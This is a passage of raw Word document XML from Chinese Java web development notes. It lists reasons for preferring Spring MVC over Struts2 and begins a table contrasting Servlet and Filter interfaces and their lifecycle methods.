      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>要优于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D09CE" w:rsidRPr="00F8704D" w:rsidRDefault="004D09CE" w:rsidP="004D09CE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="260"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F8704D" w:rsidRDefault="004D09CE" w:rsidP="004D09CE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="260"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在开发中，我更倾向使用</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，理由如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>        1</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、基于上述对比结果</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F8704D" w:rsidRDefault="004D09CE" w:rsidP="004D09CE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="260"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> 2</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>生态环境的欣欣向荣，从安全到各种服务集成具有天生的优势</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D09CE" w:rsidRDefault="004D09CE" w:rsidP="004D09CE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="260"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> 3</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>REST</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的支持</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>        4</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、有</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的基础，</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>spring mvc</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>非常容易使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005472ED" w:rsidRDefault="00743AD8" w:rsidP="005472ED">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="005472ED" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005472ED" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="005472ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Servelt</w:t>
      </w:r>
      <w:r w:rsidR="005472ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="005472ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Filter</w:t>
      </w:r>
      <w:r w:rsidR="005472ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="A3A3A3"/>
          <w:left w:val="single" w:sz="8" w:space="0" w:color="A3A3A3"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A3A3A3"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="A3A3A3"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3581"/>
        <w:gridCol w:w="3876"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidTr="00F64839">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1587"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5053"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5481"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Servlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidTr="00F64839">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1587"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5053"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>实现</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Filter</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5481"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>实现</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Servlet</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidTr="00F64839">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1587"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>使用步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5053"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>、创建类，继承接口</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>、实现方法</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:ind w:left="540"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>init()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:ind w:left="540"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>doFilter()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:ind w:left="540"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>destroy()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:ind w:left="540"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
